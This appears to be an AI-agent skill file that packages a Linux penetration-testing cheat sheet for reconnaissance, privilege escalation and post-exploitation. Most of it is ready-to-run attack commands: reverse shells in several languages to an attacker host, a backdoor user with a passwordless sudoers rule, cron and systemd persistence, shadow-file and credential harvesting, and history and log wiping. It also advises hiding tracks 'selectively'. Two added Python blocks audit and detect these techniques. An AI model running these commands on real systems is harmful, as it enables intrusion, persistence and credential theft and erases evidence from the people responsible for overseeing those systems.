linux-pentester-practical-commands


Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation

By Aradotso. Updated 6/9/2026

name: linux-pentester-practical-commands
description: Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation
triggers:
  - how do I use linux commands for pentesting
  - show me reconnaissance commands for linux
  - what are common privilege escalation techniques on linux
  - help me enumerate services on a linux target
  - how to perform post exploitation on linux systems
  - what commands do pentesters use for linux enumeration
  - show me practical linux exploitation commands
  - help with linux penetration testing workflow

Linux Pentester Practical Commands

Skill by ara.so — Security Skills collection.

Overview

Linux for a Pentester is a curated collection of practical penetration testing commands and techniques organized by engagement phase. This resource provides real-world command-line operations used during security assessments, CTFs, and penetration testing exercises on Linux systems.

The repository is structured around the penetration testing kill chain: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.

Installation

This is a reference repository, not a software package. Clone it for local reference:

git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester

Keep it accessible during engagements:

# Add to your path or create an alias
alias pentref='cd ~/tools/Linux-for-a-Pentester && ls'

# Or use it via grep for quick lookups
grep -r "find.*suid" ~/tools/Linux-for-a-Pentester/

Repository Structure

The repository is organized into six main modules:

  • 00-General-Commands: Basic Linux survival commands
  • 01-Recon: Local and network reconnaissance
  • 02-Enumeration: Service and user enumeration
  • 03-Exploitation: Initial access techniques
  • 04-Privilege-Escalation: Escalation to root/admin
  • 05-Post-Exploitation: Persistence and lateral movement
  • Cheatsheets: Quick reference one-liners

Key Command Categories

Reconnaissance Commands

Network and system discovery during initial access:

# Network interface enumeration
ip addr
ip a show
ifconfig -a

# Routing table inspection
ip route
route -n
netstat -rn

# Active connections and listening ports
ss -tunlp
netstat -tunlp
lsof -i

# ARP cache inspection
ip neigh
arp -a

# DNS enumeration
cat /etc/resolv.conf
cat /etc/hosts

# Firewall rules
iptables -L -n -v
nft list ruleset

# Running processes
ps aux
ps -ef
pstree -p

# System information
uname -a
cat /etc/os-release
lsb_release -a
hostnamectl

Enumeration Techniques

Deep enumeration for privilege escalation vectors:

# User enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow  # if accessible
cat /etc/group

# SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

# World-writable files
find / -perm -2 -type f 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null

# Sudo permissions
sudo -l

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*

# Service enumeration
systemctl list-units --type=service
service --status-all

# Listening services with PIDs
ss -tlnp
netstat -tlnp

# Environment variables
env
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'

# Mounted filesystems
mount
cat /etc/fstab
df -h

# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
ls -la ~/.ssh/
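The SUID and writable-path checks above are also the checks a hardening review runs, so here is an added audit example (not code from the Linux-for-a-Pentester repository) that implements them in Python with two refinements the one-liners lack: SUID files are compared against an assumed baseline of binaries a stock install carries, and world-writable directories are only reported when they lack the sticky bit. The demo tree it builds is constructed in a temp directory, so it never touches a real host.

```python
import os
import stat
import tempfile

# Setuid binaries a stock install is expected to carry (assumed baseline; adjust per distro).
SUID_BASELINE = {"su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
                 "mount", "umount", "ping", "fusermount"}

def _mode(path):
    try:
        return os.lstat(path).st_mode
    except OSError:
        return 0


def audit_tree(root, baseline=SUID_BASELINE):
    """Walk root and report what the find one-liners above look for."""
    findings = {"unexpected_suid": [], "ww_dirs_no_sticky": [], "ww_files": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            mode = _mode(path)
            # World-writable without the sticky bit: any user can rename or
            # delete other users' files there (unlike a proper /tmp).
            if stat.S_ISDIR(mode) and mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings["ww_dirs_no_sticky"].append(path)
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = _mode(path)
            if not stat.S_ISREG(mode):
                continue
            if mode & stat.S_ISUID and name not in baseline:
                findings["unexpected_suid"].append(path)
            if mode & stat.S_IWOTH:
                findings["ww_files"].append(path)
    return findings


def build_demo_tree():
    """Constructed throwaway tree: one of each weakness plus benign counterparts."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    for name, mode in (("scratch", 0o777), ("tmp", 0o1777)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    for name, mode in (("cp", 0o4755), ("passwd", 0o4755), ("job.sh", 0o666)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return root
```

Run `audit_tree("/")` as root for a real review; expect noise from pseudo-filesystems such as /proc, which the page's one-liners also filter out.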

Exploitation Techniques

Common exploitation patterns during pentests:

# Reverse shell - Bash
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'

# Reverse shell - Netcat
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f

# Reverse shell - Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

# Reverse shell - PHP
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Upgrade to interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Then background with Ctrl+Z and run:
# stty raw -echo; fg
# export TERM=xterm

# File transfer - Wget
wget http://$ATTACKER_IP:8000/file -O /tmp/file

# File transfer - Curl
curl http://$ATTACKER_IP:8000/file -o /tmp/file

# File transfer - Base64
echo "base64_encoded_content" | base64 -d > /tmp/file

# Simple HTTP server for exfil
python3 -m http.server 8000

Privilege Escalation Vectors

Common privilege escalation techniques:

# SUID binary exploitation example - cp
# If cp has SUID bit
/usr/bin/cp /etc/shadow /tmp/shadow.bak
# Then crack or read

# GTFOBins - Find
# If find has SUID
find . -exec /bin/bash -p \; -quit

# Sudo exploitation - less
# If sudo less is allowed
sudo less /etc/profile
# Then type: !/bin/bash

# Sudo exploitation - vim
# If sudo vim is allowed
sudo vim -c ':!/bin/bash'

# Writable /etc/passwd exploitation
openssl passwd -1 -salt xyz password
echo 'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Path hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

# LD_PRELOAD exploitation
# Create evil.c
gcc -fPIC -shared -o /tmp/evil.so evil.c -nostartfiles
sudo LD_PRELOAD=/tmp/evil.so program

# Cron job hijacking
# If writable cron script exists
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh

# Kernel exploits
uname -a
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"

# Docker escape
# If user in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Check for automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Post-Exploitation Activities

Maintaining access and lateral movement:

# Add SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# Create backdoor user
useradd -m -s /bin/bash backdoor
echo 'backdoor:password' | chpasswd
usermod -aG sudo backdoor

# Add to sudoers
echo 'backdoor ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers

# Cron persistence
(crontab -l ; echo "@reboot /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'") | crontab -

# Service persistence
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service

# Password hash extraction
cat /etc/shadow | grep -v '*' | grep -v '!'

# History clearing
history -c
rm ~/.bash_history
ln -s /dev/null ~/.bash_history

# Log clearing
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history

# Find interesting files
find / -name "*.conf" 2>/dev/null | grep -v proc
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*.db" 2>/dev/null

# Credential hunting
grep -r "password" /etc/ 2>/dev/null
grep -r "PASS" /var/www/ 2>/dev/null
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null

# Network pivoting with SSH
ssh -L 8080:internal_server:80 user@compromised_host
ssh -D 1080 user@compromised_host  # SOCKS proxy

# Port forwarding with socat
socat TCP-LISTEN:8080,fork TCP:internal_server:80
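The writable /etc/passwd trick in the privilege escalation section and the persistence mechanisms above (sudoers NOPASSWD entry, @reboot crontab, systemd unit) all leave a textual footprint a defender can grep for. This added Python example (not code from the Linux-for-a-Pentester repository) shows the detection side on constructed samples of those four files; the 203.0.113.5 address is a documentation-range placeholder standing in for $ATTACKER_IP, and the regexes are a simple heuristic for the one-liners this page lists, not a complete signature set.

```python
import re

# Constructed sample inputs (not captured from a real host); the documentation-range
# IP stands in for $ATTACKER_IP in the one-liners above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
hacker:$1$xyz$hash:0:0:root:/root:/bin/bash
"""
SAMPLE_SUDOERS = """root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
backdoor ALL=(ALL) NOPASSWD:ALL
"""
SAMPLE_CRONTAB = """0 2 * * * /usr/local/bin/backup.sh
@reboot /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
"""
SAMPLE_UNIT = """[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
Restart=always
"""

# Fragments shared by the bash, netcat and mkfifo reverse-shell one-liners on this page.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|mkfifo")
NOPASSWD_ALL_RE = re.compile(r"NOPASSWD:\s*ALL\b")

def rogue_passwd_entries(passwd_text):
    """Accounts that are UID 0 but not root, or whose password field is not a shadow marker."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        name, pw, uid = f[0], f[1], f[2]
        # A hash (or an empty field) in /etc/passwd bypasses /etc/shadow entirely.
        if (uid == "0" and name != "root") or pw not in ("x", "*", "!"):
            hits.append(name)
    return hits

def nopasswd_all_rules(sudoers_text):
    """Sudoers lines granting passwordless ALL to a user or group."""
    return [l.strip() for l in sudoers_text.splitlines() if NOPASSWD_ALL_RE.search(l)]

def reverse_shell_lines(text):
    """Crontab or unit-file lines that embed a reverse-shell fragment."""
    return [l for l in text.splitlines() if REVERSE_SHELL_RE.search(l)]
```

In practice feed these functions the real files plus every user crontab and unit under /etc/systemd/system, and alert on any non-empty result.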

Common Patterns

Initial Foothold Workflow

# 1. Initial reconnaissance
whoami && id && hostname
uname -a
cat /etc/os-release

# 2. Check sudo permissions
sudo -l

# 3. Find SUID binaries
find / -perm -4000 2>/dev/null

# 4. Check writable files
find / -writable -type f 2>/dev/null | grep -v proc

# 5. Check running services
ps aux
ss -tlnp

# 6. Enumerate users
cat /etc/passwd | grep -v nologin | grep -v false

# 7. Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*

Enumeration Script Pattern

#!/bin/bash
# Quick enumeration script

echo "[*] System Information"
uname -a
cat /etc/os-release

echo "[*] Current User"
whoami && id

echo "[*] Sudo Permissions"
sudo -l 2>/dev/null

echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null

echo "[*] Interesting Files"
find / -name "*.conf" -o -name "*.bak" 2>/dev/null | head -20

echo "[*] Network Connections"
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null

echo "[*] Users with Shell"
cat /etc/passwd | grep -v nologin | grep -v false

Troubleshooting

Limited Shell Issues

If you have a limited shell, try these escape techniques:

# Python pty spawn
python -c 'import pty; pty.spawn("/bin/bash")'

# os.system method (from an interactive Python prompt, or via python -c as here)
python -c 'import os; os.system("/bin/bash")'

# Expect spawn
expect -c 'spawn /bin/bash; interact'

# VI escape
vi
:set shell=/bin/bash
:shell

# AWK escape
awk 'BEGIN {system("/bin/bash")}'

Missing Commands

Some systems may have limited binaries. Alternatives:

# No netcat - use bash
bash -i >& /dev/tcp/$IP/4444 0>&1

# No wget - use curl
curl http://example.com/file -o output

# No curl - use wget
wget http://example.com/file -O output

# No python - use perl
perl -e 'use Socket;$i="$IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

File Transfer Issues

When standard methods fail:

# Base64 encode on attacker, decode on target
cat file | base64 -w 0
# On target:
echo "base64_string" | base64 -d > file

# Using bash's /dev/tcp (a shell feature, not a real device file, so it must be opened by redirection)
cat < /dev/tcp/$ATTACKER_IP/80 > file

# Using dd (same redirection; dd cannot open /dev/tcp through if=)
dd of=/tmp/file < /dev/tcp/$ATTACKER_IP/8000

# Using hexdump
xxd -p file | tr -d '\n'
# On target:
echo "hex_string" | xxd -r -p > file

Integration with Pentesting Workflow

This reference is designed to complement automated tools:

# Run automated enumeration
./linpeas.sh | tee linpeas_output.txt

# Cross-reference with manual commands
grep -i "suid" linpeas_output.txt

# Manually verify findings
find / -perm -4000 2>/dev/null | xargs ls -la

# Test exploitation manually
sudo -l  # If linpeas found sudo access

Best Practices

  1. Always stabilize shells immediately after getting initial access
  2. Document all commands executed during engagement for reporting
  3. Check multiple enumeration vectors - automated tools miss things
  4. Verify writable paths before attempting exploitation
  5. Test privilege escalation in isolated environment when possible
  6. Clean up artifacts during post-exploitation phase
  7. Use encryption for sensitive data exfiltration
  8. Maintain operational security - clear logs selectively, not obviously

Reference During Engagement

Quick lookup patterns:

# Quick SUID check
find / -perm -4000 2>/dev/null | grep -E '(vim|nano|find|nmap|python|perl|ruby|bash)'

# Quick sudo check for common escalation vectors
sudo -l 2>/dev/null | grep -E '(vim|nano|find|nmap|less|more|man|awk|python|perl)'

# Quick writable check
find / -writable 2>/dev/null | grep -E '(\.py$|\.sh$|cron|systemd)' | grep -v proc

This skill provides practical, battle-tested Linux commands for penetration testing operations organized by engagement phase.

Install via CLI:

npx skills add https://github.com/Aradotso/security-skills --skill linux-pentester-practical-commands

Repository: Aradotso/security-skills, branch main, path SKILL.md